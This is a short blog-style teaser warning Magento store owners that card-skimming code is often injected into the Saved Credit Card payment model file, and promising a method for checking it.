There’s no unbreakable protection. You may have the hosting provider with a great security: firewalls, antiviruses, malware protection etc., but.. Are you sure that your home/office computer is protected enough, and your neighbor is absolutely trusted person? It worth nothing to grab saved passwords, cookies, RSA keys from some computer and get an ability to access secured remote area. Recently, we’ve noticed that some sites were affected by the exploit which sends customers credit card numbers to a remote site. It’s useful to check your own site because you might not even guess about the ‘gremlin’ in your Magento installation.
Most often the exploit affects Saved Credit Card payment method, but it might be present in any other payment method as well. In this article we’ll explain how to ensure that Saved Credit Card payment method is not hacked as an example, and you can follow the same approach in order to check the relevant payment method used in your store. The malicious code is normally being placed in the payment method’s model: [magento_root]/app/code/core/Mage/Payment/Model/Method/Cc.php
Continue reading →